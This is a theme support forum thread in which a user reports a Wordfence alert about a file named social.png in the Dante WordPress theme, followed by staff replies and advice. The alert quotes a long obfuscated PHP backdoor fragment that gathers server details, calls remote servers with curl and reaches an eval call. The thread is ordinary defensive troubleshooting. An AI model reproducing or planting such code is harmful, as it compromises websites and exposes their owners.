New Landing How can we help? Themeforest Theme Support Dante Wordfence Security Scan After Update "This file appears to be malicious"

  • Posted in: Dante
  • #99664
    garymogford
    Member
    Post count: 8

    Hi I have just upgraded to the latest version of Dante and after a security scan by my Wordfence Plug In I am getting this “Critical” warning that the theme has Malicious Code.

    I tried uploading the theme on to another test site and updated to the latest version and I am getting the same warning message.

    Do you have any idea what could be the issue?

    kind regards

    Gary

    This file appears to be malicious
    Filename: wp-content/themes/dante/social.png
    File type: Not a core, theme or plugin file.
    Issue first detected: 12 mins ago.
    Severity: Critical
    Status New
    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is:

    “str_rot13(strrev($gXNjWLFkUQOugyREMXKvZBfw))); } if (isset($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’])) { $nGwzfuUZcelzyfJBQMIgkk = (int) ($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] / 100); if ($nGwzfuUZcelzyfJBQMIgkk == 0) { $nGwzfuUZcelzyfJBQMIgkk = 5; } else{ $nGwzfuUZcelzyfJBQMIgkk *= 5; } }else{ $nGwzfuUZcelzyfJBQMIgkk = 5; } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $nGwzfuUZcelzyfJBQMIgkk); } private function XsvsqpxlWxfKYiyUc($YJYRbBDIcUlLJwWidyuM) { $oXyaqmHoChvHQFCvTluqmAC = array(); foreach ($this->oXyaqmHoChvHQFCvTluqmAC[’emails’] as $HWcwGasopLJSadVNNw){ $oXyaqmHoChvHQFCvTluqmAC[] = $HWcwGasopLJSadVNNw; } foreach ($this->aJQafHDwnaPrCJrQMjHVh as $HWcwGasopLJSadVNNw) { $oXyaqmHoChvHQFCvTluqmAC[] = base64_decode(str_rot13(strrev($HWcwGasopLJSadVNNw))); } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $YJYRbBDIcUlLJwWidyuM); } private function KZdGlovqEtKYUSCqSVnK(){ $oXyaqmHoChvHQFCvTluqmAC = array(); $oXyaqmHoChvHQFCvTluqmAC[‘host’] = $_SERVER[‘HTTP_HOST’]; $oXyaqmHoChvHQFCvTluqmAC[‘page’] = $_SERVER[‘REQUEST_URI’]; $oXyaqmHoChvHQFCvTluqmAC[‘ip’] = $_SERVER[‘SERVER_ADDR’]; $oXyaqmHoChvHQFCvTluqmAC[‘eval’] = $this->YrCTrfUzBfsVJKvqiYUeFbc(); $oXyaqmHoChvHQFCvTluqmAC[‘exec’] = $this->KNstTqErzZQBDQOODaJdLv(); $oXyaqmHoChvHQFCvTluqmAC[‘serverKey’] = $this->BkISKDyWWRXScnLPbTlyI(); $oXyaqmHoChvHQFCvTluqmAC[‘run’] = 0; $oXyaqmHoChvHQFCvTluqmAC[‘ver’] = ‘0.2a’; $oXyaqmHoChvHQFCvTluqmAC[‘started’] = date(‘Ymd’); $oXyaqmHoChvHQFCvTluqmAC[‘last_connect’] = date(‘Ymd’); $this->WbKPQMoSbMZkXUeYKXRIk = $oXyaqmHoChvHQFCvTluqmAC; return $oXyaqmHoChvHQFCvTluqmAC; } private function BkISKDyWWRXScnLPbTlyI($PVSXPKLAQGaWKUtNNUYQFoBuJE = 10) { $dqkdbOJPzAPsLsuxnjAStdXUDis = ‘0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’; $PqlpeiQHmZBwdmlsfEHmg = ”; for ($BCEUSjHFFwzzqmHmpjjQI = 0; $BCEUSjHFFwzzqmHmpjjQI < $PVSXPKLAQGaWKUtNNUYQFoBuJE; $BCEUSjHFFwzzqmHmpjjQI++) { $PqlpeiQHmZBwdmlsfEHmg .= 
$dqkdbOJPzAPsLsuxnjAStdXUDis[rand(0, strlen($dqkdbOJPzAPsLsuxnjAStdXUDis) – 1)]; } return $PqlpeiQHmZBwdmlsfEHmg; } public function KPBBXYwmuPGPaTyLhWevI(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if (@$oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] < date(‘Ymd’)){ $oXyaqmHoChvHQFCvTluqmAC = $this->CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC == false){ return; } else{ unset($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’]); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] = date(‘Ymd’); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘run’]++; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); } private function CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC){ $yYVsqvOoqWsddypXgJcIKOw = @$oXyaqmHoChvHQFCvTluqmAC[‘servers’]; $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($yYVsqvOoqWsddypXgJcIKOw, $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false){ return $uHrzRBdPUetDqbZAdw; } $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($this->HSxTktcbTftjZjKRHHmhr(), $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false) { return $uHrzRBdPUetDqbZAdw; } $this->XnpSvtOjNDRmxyfzaDKlGwM(); } private function tEiRFSJMSpXyxKKORPZClI($QrnkCEWRkHbQPoEPelYQRw, $oXyaqmHoChvHQFCvTluqmAC) { foreach ($QrnkCEWRkHbQPoEPelYQRw as $gXNjWLFkUQOugyREMXKvZBfw) { $uHrzRBdPUetDqbZAdw = $this->VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $oXyaqmHoChvHQFCvTluqmAC[‘info’], $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw != false) { if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’])){ $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] = 0; } if ($this->YobOrWbieESFVcSsWsuBypg) { $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]++; if (!isset($BCEUSjHFFwzzqmHmpjjQI)){ $BCEUSjHFFwzzqmHmpjjQI = (int)($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] / 5); } if ($BCEUSjHFFwzzqmHmpjjQI > 0) { $BCEUSjHFFwzzqmHmpjjQI–; continue; } } if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $uHrzRBdPUetDqbZAdw[‘info’][’empty’] 
= –$oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]; return $uHrzRBdPUetDqbZAdw; } } return false; } private function VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk, $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = false; $OQijXfnrxWxPIcPSUibKEFmLE = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk); $OQijXfnrxWxPIcPSUibKEFmLE = $this->gTSiihhIRUNPkADDVdes($OQijXfnrxWxPIcPSUibKEFmLE); if ($OQijXfnrxWxPIcPSUibKEFmLE != false) { if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $OQijXfnrxWxPIcPSUibKEFmLE[‘info’] = $WbKPQMoSbMZkXUeYKXRIk; return $OQijXfnrxWxPIcPSUibKEFmLE; } return false; } private function gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluqmAC){ if(!isset($this->WbKPQMoSbMZkXUeYKXRIk)){ $this->WbKPQMoSbMZkXUeYKXRIk = $this->oXyaqmHoChvHQFCvTluqmAC[‘info’]; } if (md5($this->WbKPQMoSbMZkXUeYKXRIk[‘serverKey’]) == $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = true; return true; } $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); $oXyaqmHoChvHQFCvTluqmAC = json_decode($oXyaqmHoChvHQFCvTluqmAC, true); if ($oXyaqmHoChvHQFCvTluqmAC == false) { return false; } else{ if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘servers’])) { return false; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk = null,$BZaxGALPLdVfntBIQWUPs = null){ if (strstr($gXNjWLFkUQOugyREMXKvZBfw, $_SERVER[‘HTTP_HOST’]) || trim($gXNjWLFkUQOugyREMXKvZBfw) == ”) { return false; } if (isset($WbKPQMoSbMZkXUeYKXRIk)) { $BdlbpgzPBjxVLkBLnsrXkmI = json_encode($WbKPQMoSbMZkXUeYKXRIk); $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC($BdlbpgzPBjxVLkBLnsrXkmI); $WbKPQMoSbMZkXUeYKXRIk = array( “serverKey” => $WbKPQMoSbMZkXUeYKXRIk[‘serverKey’], “data” => $oXyaqmHoChvHQFCvTluqmAC[‘data’], “key” => $oXyaqmHoChvHQFCvTluqmAC[‘key’] ); } while 
(true){ $SCvWTGyfCYyeLdjcFFzobk = curl_init(); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_URL,”http://$gXNjWLFkUQOugyREMXKvZBfw&#8221;); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_RETURNTRANSFER,1); @curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_FOLLOWLOCATION, true); if (isset($WbKPQMoSbMZkXUeYKXRIk)) { curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_CUSTOMREQUEST, “POST”); curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRIk); } curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_CONNECTTIMEOUT,10); $oXyaqmHoChvHQFCvTluqmAC = curl_exec($SCvWTGyfCYyeLdjcFFzobk); curl_close($SCvWTGyfCYyeLdjcFFzobk); if (!strstr($oXyaqmHoChvHQFCvTluqmAC, “301 Moved Permanently”)) { break; } else{ preg_match_all(‘//’,$oXyaqmHoChvHQFCvTluqmAC,$NyFDhMvsSaUwvJsx); $gXNjWLFkUQOugyREMXKvZBfw = $NyFDhMvsSaUwvJsx[1][0]; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function aIIwgKgvtyRoWoMedUdbp($piiJbwvzLxHvKjlNnFzd, $oXyaqmHoChvHQFCvTluqmAC) { if (is_array($oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = json_encode($oXyaqmHoChvHQFCvTluqmAC); } $ilUTrmqGvQsBtZfyeBXfg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->MFmjdYJpnAEmbwnXvkQU($oXyaqmHoChvHQFCvTluqmAC); if ($this->YYfeblxJfGQgkPpfdrIOXNZwHg($ilUTrmqGvQsBtZfyeBXfg)) $oXyaqmHoChvHQFCvTluqmAC = json_decode($ilUTrmqGvQsBtZfyeBXfg, true); if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘key’]) || !isset($oXyaqmHoChvHQFCvTluqmAC[‘data’]) || strlen($oXyaqmHoChvHQFCvTluqmAC[‘key’]) == 0 || strlen($oXyaqmHoChvHQFCvTluqmAC[‘data’]) == 0 ) { die(); } update_option($piiJbwvzLxHvKjlNnFzd, $ilUTrmqGvQsBtZfyeBXfg); } private function McEnUjjQfaFzqGsihhU($piiJbwvzLxHvKjlNnFzd, $ysnqBUjsRbJDIlZaAE = false) { if (!$ysnqBUjsRbJDIlZaAE) { $oXyaqmHoChvHQFCvTluqmAC = get_option($piiJbwvzLxHvKjlNnFzd); }else{ $oXyaqmHoChvHQFCvTluqmAC = $piiJbwvzLxHvKjlNnFzd; } $GfNOeQGoTKggozAbXZAUpg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); return json_decode($GfNOeQGoTKggozAbXZAUpg, true); } private function 
YrCTrfUzBfsVJKvqiYUeFbc(){ $givBPiVtALrQjPLInUFKegOE = false; @eval(“.

    #99761
    Kyle – SUPPORT
    Moderator
    Post count: 35880

    Hi

    There’s no social.png in my Dante folder, you can delete that file

    – Kyle

    #99762
    Mohammad – SUPPORT
    Moderator
    Post count: 27441

    Hi,
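    Please delete the current file and contact your hosting provider to secure your website. [Note: Wordfence reports social.png as not a core, theme or plugin file, so deleting it does not explain how it was written to the server. The quoted fragment also calls update_option() and makes outbound curl requests, so the WordPress options table and other recently changed files should be checked as well.]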
    Thanks 🙂
    With Best Regards
    Mohammad

    #99779
    garymogford
    Member
    Post count: 8

    Ok Mohammed

    Thank you for that. I have deleted the file & rescanned and all ok

    I just thought I should let you know as the issue only showed up when I upgraded to the latest version of Dante Theme

    I tested it on some other test sites that I have and exactly the same thing happened when I upgraded and re scanned

    So I just thought it might be an issue with the Dante update?

    All seems ok now

    Thank you

    Gary

    #99782
    Mohammad – SUPPORT
    Moderator
    Post count: 27441

    Hi,
    Thanks for this information, and I will inform the developer of the theme.
    With Best Regards
    Mohammad

    #99783
    garymogford
    Member
    Post count: 8

    OK Thank you again for your help

    #99786
    Mohammad – SUPPORT
    Moderator
    Post count: 27441

    You're most welcome.
    Thanks 🙂
    With Best Regards
    Mohammad

    #100032
    Swift Ideas – Ed
    Keymaster
    Post count: 15264

    @garymogford – thanks for letting us know, where did you get this update from?

    – Ed

    #100051
    garymogford
    Member
    Post count: 8

    Hi Ed

    It came up in my wp dashboard that the theme was out of date so I clicked on update and everything seemed fine.

    But then I got an email from my Wordfence Security plug in saying there was malicious code in the dante theme files (as attached in original email)

    So I tested it again on my test site and it did the same thing.

    So I thought it best to let you know as I assume the update I did came direct from you?

    I have deleted the file & rescanned it and all seems ok now but not sure how it got into your update.

    Kind regards

    Gary

    #100082
    Swift Ideas – Ed
    Keymaster
    Post count: 15264

    Hi Gary,

    I’ve checked and can’t see this in the update – but will investigate further. There is no file such as this in the current available files.

    Thanks,

    – Ed

